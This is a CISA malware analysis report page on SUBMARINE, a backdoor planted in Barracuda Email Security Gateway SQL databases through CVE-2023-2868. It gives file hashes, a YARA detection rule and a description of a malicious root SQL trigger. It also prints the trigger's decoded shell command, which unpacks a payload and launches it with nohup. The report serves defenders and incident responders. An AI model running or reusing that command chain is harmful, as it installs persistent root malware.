

<!DOCTYPE html>
<html lang="en" dir="ltr" prefix="og: https://ogp.me/ns#" class="no-js">
  <head>
    <meta charset="utf-8" />
<script async src="https://www.googletagmanager.com/gtag/js?id=G-9MDR73GM0K"></script>
<script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments)};gtag("js", new Date());gtag("set", "developer_id.dMDhkMT", true);gtag("config", "G-9MDR73GM0K", {"groups":"default","page_placeholder":"PLACEHOLDER_page_location"});</script>
<link rel="canonical" href="https://www.cisa.gov/news-events/analysis-reports/ar23-209a" />
<meta property="og:site_name" content="Cybersecurity and Infrastructure Security Agency CISA" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://www.cisa.gov/news-events/analysis-reports/ar23-209a" />
<meta property="og:title" content="MAR-10454006-r1.v2 SUBMARINE Backdoor | CISA" />
<meta name="Generator" content="Drupal 9 (https://www.drupal.org)" />
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="icon" href="/profiles/cisad8_gov/themes/custom/gesso/favicon.png" type="image/png" />

    <title>MAR-10454006-r1.v2 SUBMARINE Backdoor | CISA</title>
    <link rel="stylesheet" media="all" href="/core/modules/system/css/components/ajax-progress.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/align.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/autocomplete-loading.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/fieldgroup.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/container-inline.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/clearfix.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/details.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/hidden.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/item-list.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/js.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/nowrap.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/position-container.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/progress.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/reset-appearance.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/resize.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/sticky-header.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/system-status-counter.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/system-status-report-counters.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/system-status-report-general-info.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/tabledrag.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/tablesort.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/system/css/components/tree-child.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/views/css/views.module.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/responsive_tables_filter/css/tablesaw-base.css?ryttwc" />
<link rel="stylesheet" media="screen" href="/modules/contrib/responsive_tables_filter/css/tablesaw-responsive.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/responsive_tables_filter/css/tables.columntoggle.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/responsive_tables_filter/css/customizations.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/filter/css/filter.caption.css?ryttwc" />
<link rel="stylesheet" media="all" href="/core/modules/media/css/filter.caption.css?ryttwc" />
<link rel="stylesheet" media="all" href="/profiles/cisad8_gov/modules/custom/toolbar_tasks/css/toolbar.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/extlink/extlink.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/ckeditor_accordion/css/ckeditor-accordion.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/better_social_sharing_buttons/css/better_social_sharing_buttons.css?ryttwc" />
<link rel="stylesheet" media="all" href="/modules/contrib/paragraphs/css/paragraphs.unpublished.css?ryttwc" />
<link rel="stylesheet" media="all" href="//fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700&amp;family=Public+Sans:wght@400;500;600;700&amp;display=swap" />
<link rel="stylesheet" media="all" href="/profiles/cisad8_gov/themes/custom/gesso/dist/css/styles.css?ryttwc" />

    
  </head>
  <body  class="path-node not-front node-page node-page--node-type-advisory" id="top">
    
<div  class="c-skiplinks">
  <a href="#main" class="c-skiplinks__link u-visually-hidden u-focusable">Skip to main content</a>
</div>
    
      <div class="dialog-off-canvas-main-canvas" data-off-canvas-main-canvas>
    

<div  class="l-site-container">
    
      
<section  class="usa-banner" aria-label="Official government website">
  <div class="usa-accordion">  <header class="usa-banner__header">
    <div class="usa-banner__inner">
      <div class="grid-col-auto">
        <img class="usa-banner__header-flag" src="/profiles/cisad8_gov/themes/custom/gesso/dist/images/us_flag_small.png" alt="U.S. flag" />
      </div>
      <div class="grid-col-fill tablet:grid-col-auto">
        <p class="usa-banner__header-text">An official website of the United States government</p>
              <p class="usa-banner__header-action" aria-hidden="true">Here’s how you know</p></div>
        <button class="usa-accordion__button usa-banner__button" aria-expanded="false" aria-controls="gov-banner">
          <span class="usa-banner__button-text">Here’s how you know</span>
        </button>
          </div>
  </header>
      <div class="usa-banner__content usa-accordion__content" id="gov-banner">
      <div class="grid-row grid-gap-lg">
                  <div class="usa-banner__guidance tablet:grid-col-6">
            <img class="usa-banner__icon usa-media-block__img" src="/profiles/cisad8_gov/themes/custom/gesso/dist/images/icon-dot-gov.svg" alt="Dot gov">
            <div class="usa-media-block__body">
              <p>
                <strong>Official websites use .gov</strong>
                <br> A <strong>.gov</strong> website belongs to an official government organization in the United States.
              </p>
            </div>
          </div>
                  <div class="usa-banner__guidance tablet:grid-col-6">
            <img class="usa-banner__icon usa-media-block__img" src="/profiles/cisad8_gov/themes/custom/gesso/dist/images/icon-https.svg" alt="HTTPS">
            <div class="usa-media-block__body">
              <p>
                <strong>Secure .gov websites use HTTPS</strong>
                <br> A <strong>lock</strong> (<span class="icon-lock"><svg xmlns="http://www.w3.org/2000/svg" width="52" height="64" viewBox="0 0 52 64" class="usa-banner__lock-image" role="img" aria-labelledby="banner-lock-title banner-lock-description"><title id="banner-lock-title">Lock</title><desc id="banner-lock-description">A locked padlock</desc><path fill="#000000" fill-rule="evenodd" d="M26 0c10.493 0 19 8.507 19 19v9h3a4 4 0 0 1 4 4v28a4 4 0 0 1-4 4H4a4 4 0 0 1-4-4V32a4 4 0 0 1 4-4h3v-9C7 8.507 15.507 0 26 0zm0 8c-5.979 0-10.843 4.77-10.996 10.712L15 19v9h22v-9c0-6.075-4.925-11-11-11z"/></svg></span>) or <strong>https://</strong> means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.
              </p>
            </div>
          </div>
              </div>
    </div>
  </div>
  </section>

  
  


<div class="usa-overlay"></div>
<header  class="usa-header usa-header--extended" role="banner">
        
<div  class="usa-navbar">
  <div class="l-constrain">
    <div class="usa-navbar__row">
      <div class="usa-navbar__brand">
        
<a  class="c-site-name" href="/" rel="home" title="Go to the Cybersecurity & Infrastructure Security Agency homepage">
  <span class="c-site-name__text">Cybersecurity &amp; Infrastructure Security Agency</span>
</a>        <div class="usa-navbar__tagline">America's Cyber Defense Agency</div>
      </div>
      <div class="usa-navbar__search">
        <div class="usa-navbar__search-header">
          <p>Search</p>
        </div>
        
<div  class="usa-search">
  <script async src=https://cse.google.com/cse.js?cx=ffc4c79e29d5b3a8c></script>
  <div class="gcse-searchbox-only" data-resultsurl="/search">&nbsp;</div>
</div>
      </div>
      <button class="mobile-menu-button usa-menu-btn">Menu</button>
    </div>
  </div>
</div>
    

<nav  class="usa-nav" role="navigation" aria-label="Primary navigation">
  <div class="usa-nav__inner l-constrain">
    <div class="usa-nav__row">
      <button class="usa-nav__close">Close</button>
      
<div  class="usa-search">
  <script async src=https://cse.google.com/cse.js?cx=ffc4c79e29d5b3a8c></script>
  <div class="gcse-searchbox-only" data-resultsurl="/search">&nbsp;</div>
</div>
                
  
          <ul class="usa-nav__primary usa-accordion">
    
    
              <li class="usa-nav__primary-item topics">
      
              <button class="usa-accordion__button usa-nav__link " aria-expanded="false" aria-controls="basic-mega-nav-section-1">
          <span>Topics</span>
        </button>
      
                
  
          <div id="basic-mega-nav-section-1" class="usa-nav__submenu usa-megamenu" hidden="">

              <div class="usa-megamenu__parent-link">
          <a href="/topics">Topics</a>
        </div>
              <div class="usa-megamenu__menu-items">
    
    
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/cybersecurity-best-practices">
          <span>Cybersecurity Best Practices</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/cyber-threats-and-advisories">
          <span>Cyber Threats and Advisories</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/critical-infrastructure-security-and-resilience">
          <span>Critical Infrastructure Security and Resilience</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/election-security">
          <span>Election Security</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/emergency-communications">
          <span>Emergency Communications</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/industrial-control-systems">
          <span>Industrial Control Systems</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/information-communications-technology-supply-chain-security">
          <span>Information and Communications Technology Supply Chain Security</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/partnerships-and-collaboration">
          <span>Partnerships and Collaboration</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/physical-security">
          <span>Physical Security</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/topics/risk-management">
          <span>Risk Management</span>
        </a>
                  </div>
              
              </div>
          
            </div>
                          

<div  class="c-menu-feature-links">
      <div class="c-menu-feature-links__title">
      <a href="/audiences">        How can we help?
      </a>    </div>
        <div class="c-menu-feature-links__content"><a href="/topics/government">Government</a><a href="/topics/educational-institutions">Educational Institutions</a><a href="/topics/industry">Industry</a><a href="/topics/state-local-tribal-and-territorial">State, Local, Tribal, and Territorial</a><a href="/topics/individuals-and-families">Individuals and Families</a><a href="/topics/small-and-medium-businesses">Small and Medium Businesses</a><a href="/audiences/find-help-locally">Find Help Locally</a></div>
  </div>

              </div>
    
  
      
              </li>
          
              <li class="usa-nav__primary-item spotlight">
      
      
                      <a href="/spotlight" class="usa-nav__link" >
          <span>Spotlight</span>
        </a>
              
              </li>
          
              <li class="usa-nav__primary-item resources--tools">
      
              <button class="usa-accordion__button usa-nav__link " aria-expanded="false" aria-controls="basic-mega-nav-section-3">
          <span>Resources &amp; Tools</span>
        </button>
      
                
  
          <div id="basic-mega-nav-section-3" class="usa-nav__submenu usa-megamenu" hidden="">

              <div class="usa-megamenu__parent-link">
          <a href="/resources-tools">Resources &amp; Tools</a>
        </div>
              <div class="usa-megamenu__menu-items">
    
    
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/resources-tools/all-resources-tools">
          <span>All Resources &amp; Tools</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/resources-tools/services">
          <span>Services</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/resources-tools/programs">
          <span>Programs</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/resources-tools/resources">
          <span>Resources</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/resources-tools/training">
          <span>Training</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/resources-tools/groups">
          <span>Groups</span>
        </a>
                  </div>
              
              </div>
          
            </div>
                          
              </div>
    
  
      
              </li>
          
              <li class="usa-nav__primary-item news--events">
      
              <button class="usa-accordion__button usa-nav__link usa-current" aria-expanded="false" aria-controls="basic-mega-nav-section-4">
          <span>News &amp; Events</span>
        </button>
      
                
  
          <div id="basic-mega-nav-section-4" class="usa-nav__submenu usa-megamenu" hidden="">

              <div class="usa-megamenu__parent-link">
          <a href="/news-events">News &amp; Events</a>
        </div>
              <div class="usa-megamenu__menu-items">
    
    
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/news-events/news">
          <span>News</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/news-events/events">
          <span>Events</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/news-events/cybersecurity-advisories">
          <span>Cybersecurity Alerts &amp; Advisories</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/news-events/directives">
          <span>Directives</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/news-events/request-speaker">
          <span>Request a CISA Speaker</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/news-events/congressional-testimony">
          <span>Congressional Testimony</span>
        </a>
                  </div>
              
              </div>
          
            </div>
                          
              </div>
    
  
      
              </li>
          
              <li class="usa-nav__primary-item careers">
      
              <button class="usa-accordion__button usa-nav__link " aria-expanded="false" aria-controls="basic-mega-nav-section-5">
          <span>Careers</span>
        </button>
      
                
  
          <div id="basic-mega-nav-section-5" class="usa-nav__submenu usa-megamenu" hidden="">

              <div class="usa-megamenu__parent-link">
          <a href="/careers">Careers</a>
        </div>
              <div class="usa-megamenu__menu-items">
    
    
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/careers/benefits-perks">
          <span>Benefits &amp; Perks</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/careers/hirevue-applicant-reasonable-accommodations-process">
          <span>HireVue Applicant Reasonable Accommodations Process</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/general-recruitment-and-hiring-faqs">
          <span>Hiring</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/careers/resume-application-tips">
          <span>Resume &amp; Application Tips</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/students-recent-graduates-employment-opportunities">
          <span>Students &amp; Recent Graduates</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/careers/veteran-and-military-spouse-employment-opportunities">
          <span>Veteran and Military Spouses</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/careers/work-cisa">
          <span>Work @ CISA</span>
        </a>
                  </div>
              
              </div>
          
            </div>
                          
              </div>
    
  
      
              </li>
          
              <li class="usa-nav__primary-item about">
      
              <button class="usa-accordion__button usa-nav__link " aria-expanded="false" aria-controls="basic-mega-nav-section-6">
          <span>About</span>
        </button>
      
                
  
          <div id="basic-mega-nav-section-6" class="usa-nav__submenu usa-megamenu" hidden="">

              <div class="usa-megamenu__parent-link">
          <a href="/about">About</a>
        </div>
              <div class="usa-megamenu__menu-items">
    
    
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/about/culture">
          <span>Culture</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/about/divisions-offices">
          <span>Divisions &amp; Offices</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/about/regions">
          <span>Regions</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/about/leadership">
          <span>Leadership</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/doing-business-cisa">
          <span>Doing Business with CISA</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/about/contact-us">
          <span>Contact Us</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/site-links">
          <span>Site Links</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/reporting-employee-and-contractor-misconduct">
          <span>Reporting Employee and Contractor Misconduct</span>
        </a>
                  </div>
              
              </div>
          
              <div class="usa-col">

              
      
                        <div class="usa-nav__submenu-item">
                <a href="/cisa-github">
          <span>CISA GitHub</span>
        </a>
                  </div>
              
              </div>
          
            </div>
                          
              </div>
    
  
      
              </li>
          
    
      </ul>
    
  


                    <a href="/report" class="c-button c-button--report">Report a Cyber Issue</a>
          </div>
  </div>
</nav>
    </header>


  <div class="gesso-mobile-tagline-container">
    <div class="usa-navbar__tagline">America's Cyber Defense Agency</div>
  </div>

  
  
<div  class="l-breadcrumb">
  <div class="l-constrain">
    <div class="l-breadcrumb__row">
      







  
  
    

  
              


<nav  aria-labelledby="breadcrumb-label" class="c-breadcrumb" role="navigation">
  <div class="l-constrain">
    <div
       id="breadcrumb-label" class="c-breadcrumb__title  u-visually-hidden">Breadcrumb</div>
    <ol class="c-breadcrumb__list">
              <li class="c-breadcrumb__item">
                      <a class="c-breadcrumb__link" href="/">Home</a>
                  </li>
              <li class="c-breadcrumb__item">
                      <a class="c-breadcrumb__link" href="/news-events">News & Events</a>
                  </li>
              <li class="c-breadcrumb__item">
                      <a class="c-breadcrumb__link" href="/news-events/cybersecurity-advisories">Cybersecurity Advisories</a>
                  </li>
              <li class="c-breadcrumb__item">
                      <a class="c-breadcrumb__link" href="/news-events/cybersecurity-advisories?f%5B0%5D=advisory_type%3A65">Analysis Report</a>
                  </li>
          </ol>
  </div>
</nav>

  
  
  
  






  <div  id="block-bettersocialsharingbuttons" class="c-block c-block--social-share c-block--provider-better-social-sharing-buttons c-block--id-social-sharing-buttons-block">

  
  
    

      <div  class="c-block__content">
  
      <div class="c-block__row">
      <span>Share:</span>
      

<div style="display: none"><link rel="preload" href="/modules/contrib/better_social_sharing_buttons/assets/dist/sprites/social-icons--no-color.svg" as="image" type="image/svg+xml" crossorigin="anonymous" /></div>

<div class="social-sharing-buttons">
                <a href="https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/analysis-reports/ar23-209a&amp;title=MAR-10454006-r1.v2%20SUBMARINE%20Backdoor" target="_blank" title="Share to Facebook" aria-label="Share to Facebook" class="social-sharing-buttons__button share-facebook" rel="noopener">
            <svg width="18px" height="18px" style="border-radius:3px;">
                <use href="/modules/contrib/better_social_sharing_buttons/assets/dist/sprites/social-icons--no-color.svg#facebook" />
            </svg>
        </a>
    
                <a href="https://twitter.com/intent/tweet?text=MAR-10454006-r1.v2%20SUBMARINE%20Backdoor+https://www.cisa.gov/news-events/analysis-reports/ar23-209a" target="_blank" title="Share to Twitter" aria-label="Share to Twitter" class="social-sharing-buttons__button share-twitter" rel="noopener">
            <svg width="18px" height="18px" style="border-radius:3px;">
                <use href="/modules/contrib/better_social_sharing_buttons/assets/dist/sprites/social-icons--no-color.svg#twitter" />
            </svg>
        </a>
    
        
        
        
                <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/analysis-reports/ar23-209a" target="_blank" title="Share to Linkedin" aria-label="Share to Linkedin" class="social-sharing-buttons__button share-linkedin" rel="noopener">
            <svg width="18px" height="18px" style="border-radius:3px;">
                <use href="/modules/contrib/better_social_sharing_buttons/assets/dist/sprites/social-icons--no-color.svg#linkedin" />
            </svg>
        </a>
    
        
        
        
        
        
                <a href="mailto:?subject=MAR-10454006-r1.v2%20SUBMARINE%20Backdoor&amp;body=https://www.cisa.gov/news-events/analysis-reports/ar23-209a" title="Share to Email" aria-label="Share to Email" class="social-sharing-buttons__button share-email" target="_blank" rel="noopener">
            <svg width="18px" height="18px" style="border-radius:3px;">
                <use href="/modules/contrib/better_social_sharing_buttons/assets/dist/sprites/social-icons--no-color.svg#email" />
            </svg>
        </a>
    
        
    </div>

    </div>
  
      </div>
  
  
  </div>

    </div>
  </div>
</div>

  
  

  <main id="main" class="c-main" role="main" tabindex="-1">
    
      
    


<div  class="l-content">
          







  
  
    

  
            





<div  role="article" class="is-promoted l-full">
    <div class="l-full__header">
        
<div  class="c-page-title">
  <div class="c-page-title__inner l-constrain">
    <div class="c-page-title__row">
      <div class="c-page-title__content">
                  <div class="c-page-title__meta">Analysis Report</div>
                <h1 class="c-page-title__title">
<span>MAR-10454006-r1.v2 SUBMARINE Backdoor</span>
</h1>
                                                          <div class="c-page-title__fields">  




<div  class="c-field c-field--name-field-release-date c-field--type-datetime c-field--label-above">
  <div  class="c-field__label">Release Date</div><div class="c-field__content"><time datetime="2023-07-28T12:00:00Z">July 28, 2023</time></div></div>

  




<div  class="c-field c-field--name-field-alert-code c-field--type-string c-field--label-above">
  <div  class="c-field__label">Alert Code</div><div class="c-field__content">AR23-209A</div></div>

</div>
                        
        
      </div>
          </div>
    <div class="c-page-title__decoration"></div>
  </div>
</div>
    </div>
    <div class="l-full__main">
                      

<div  class="l-page-section l-page-section--rich-text">
      <div class="l-constrain">
  
  
  <div class="l-page-section__content">
          <p>  </p>
<table id="cma-table"><tbody><tr><td>
<h3>Notification</h3>
<p>This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.</p>
<p>This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.</p>
<h3>Summary</h3>
<h5>Description</h5>
<p>CISA obtained seven malware samples related to a novel backdoor CISA has named SUBMARINE. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting certain versions 5.1.3.001 - 9.2.0.006 of Barracuda Email Security Gateway (ESG).</p>
<p>			SUBMARINE is a novel persistent backdoor that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts that, in a multi-step process, enable execution with root privileges, persistence, command and control, and cleanup. In addition to SUBMARINE, CISA obtained associated Multipurpose Internet Mail Extensions (MIME) attachment files from the victim. These files contained the contents of the compromised SQL database, which included sensitive information.</p>
<p>			For information about related malware, specifically information on the initial exploit payload and other backdoors, see CISA Alert: <a href="/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors">CISA Releases Malware Analysis Reports on Barracuda Backdoors</a>.</p>
<p>Download the PDF version of this report:</p>



<div class="align-center c-file">
    <div class="c-file__download">
    <a href="/sites/default/files/2023-07/MAR-10454006.r1.v2.CLEAR_.pdf" class="c-file__link" target="_blank">AR23-209A PDF</a>
    <span class="c-file__size">(PDF,       1.18 MB
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs associated with this MAR in JSON format, see:</p>



<div class="align-center c-file">
    <div class="c-file__download">
    <a href="/sites/default/files/2023-07/MAR-10454006.r1.v2.CLEAR_stix2.json" class="c-file__link" target="_blank">AR23-209A JSON</a>
    <span class="c-file__size">(JSON,       48.51 KB
  )</span>
  </div>
</div>
<h5>Submitted Files (5)</h5>
<p>6dd8de093e391da96070a978209ebdf9d807e05c89dba13971be5aea2e1251d0 (r)</p>
<p>81cf3b162a4fe1f1b916021ec652ade4a14df808021eeb9f7c81c8d2326bddab (libutil.so)</p>
<p>8695945155d3a87a5733d31bf0f4c897e133381175e1a3cdc8c73d9e38640239 (machineecho_-n_Y2htb2QgK3ggL3J...)</p>
<p>b98f8989e8706380f779bfd464f3dea87c122651a7a6d06a994d9a4758e12e43 (sedO4CWZ9)</p>
<p>cc131dd1976a47ee3b631a136c3224a138716e9053e04d8bea3ee2e2c5de451a (smtpctl)</p>
<h5>Additional Files (2)</h5>
<p>2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5 (config.TRG)</p>
<p>bbbae0455f8c98cc955487125a791052353456c8f652ddee14f452415c0b235a (run.sh)</p>
<h3>Findings</h3>
<h4>2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5</h4>
<h5>Details</h5>
<p>			--&gt;</p>
<table><tbody><tr><th>Name</th>
<td>config.TRG</td>
</tr><tr><th>Size</th>
<td>5465 bytes</td>
</tr><tr><th>Type</th>
<td>ASCII text, with very long lines</td>
</tr><tr><th>MD5</th>
<td>d03e1f112f0c784a39003e0b3992ad80</td>
</tr><tr><th>SHA1</th>
<td>447369281ba26b7a6da4f659aa31026605aa3c6f</td>
</tr><tr><th>SHA256</th>
<td>2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5</td>
</tr><tr><th>SHA512</th>
<td>aead33a656f647d58da0a7f5240eb8cd7c0121c9ea33ae6504687b5faf21779e67b659a93987392033ea8ae2aae239e432444dcddad52f2a8665add7265902f6</td>
</tr><tr><th>ssdeep</th>
<td>96:CjXDCc0wSWbCZgFHwlJc8UpsmdpanoP5Mc8wWuMdHABIz2mN:CjXDN0wSWQp08UpsmFm4mhCm</td>
</tr><tr><th>Entropy</th>
<td>6.062477</td>
</tr><tr><th>Malware Result</th>
<td>unknown</td>
</tr></tbody></table><h5>Antivirus</h5>
<p>No matches found.</p>
<h5>YARA Rules</h5>
<ul><li>rule CISA_10454006_06 : SUBMARINE trojan backdoor cleans_traces_of_infection hides_artifacts installs_other_components<br />
				{<br />
				   meta:<br />
				       Author = "CISA Code &amp; Media Analysis"<br />
				       Incident = "10454006"<br />
				       Date = "2023-07-11"<br />
				       Last_Modified = "20230727_1200"<br />
				       Actor = "n/a"<br />
				       Family = "SUBMARINE"<br />
				       Capabilities = "cleans-traces-of-infection hides-artifacts installs-other-components"<br />
				       Malware_Type = "trojan backdoor"<br />
				       Tool_Type = "unknown"<br />
				       Description = "Detects SUBMARINE SQL trigger samples"<br />
				       SHA256_1 = "2a353e9c250e5ea905fa59d33faeaaa197d17b4a4785456133aab5dbc1d1d5d5"<br />
				   strings:<br />
				       $s1 = { 54 52 49 47 47 45 52 }<br />
				       $s2 = { 43 52 45 41 54 45 }<br />
				       $s3 = { 53 45 4c 45 43 54 20 22 65 63 68 6f 20 2d 6e }<br />
				       $s4 = { 62 61 73 65 36 34 20 2d 64 20 7c 20 73 68 }<br />
				       $s5 = { 72 6f 6f 74 }<br />
				       $s6 = { 53 45 54 }<br />
				       $s7 = { 45 4e 44 20 49 46 3b }<br />
				       $s8 = { 48 34 73 49 41 41 41 41 41 41 41 41 41 2b 30 61 43 33 42 55 }<br />
				       $s9 = { 2f 76 61 72 2f 74 6d 70 2f 72 }<br />
				       $s10 = { 2f 72 6f 6f 74 2f 6d 61 63 68 69 6e 65 }<br />
				   condition:<br />
				   filesize &lt; 250KB and all of them<br />
				}</li>
</ul><h5>ssdeep Matches</h5>
<p>No matches found.</p>
<h5>Description</h5>
<p>The file 'config.TRG' is a SUBMARINE artifact. The presence of the filename, 'config.TRG' does not indicate that the ESG is infected. Instead, it is the actual contents of the file that determine whether it is infected or not. The contents of 'config.TRG' is contained within the SQL database file called 'config.snapshot' and the MIME attachments. Presence of the contents of the file 'config.TRG' within the SQL database is indicative of an infection of SUBMARINE.</p>
<p>			The file contains a malicious SQL trigger called ‘cuda_trigger’ (Figure 1). This SQL trigger is set to run as root on the local host before a row is deleted from the database. After the trigger parameters are met, two actions occur. First a compressed, base64 encoded blob containing 2 files is written into a file called ‘r’ in the ‘/var/tmp’ directory (Figure 2). Second, a base64 encoded command is executed (Figure 3).</p>
<p>			--Begin Base64 Decoded Command--<br />
			cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp<br />
			nohup bash /var/tmp/run.sh &lt;BSMTP_ID&gt; &gt;/dev/null 2&gt;&amp;1 &amp;<br />
			rm -f /root/machine\` *chmod +x /root/mac*<br />
			sh /root/mach*\`*<br />
			--End Base64 Decoded Command--</p>
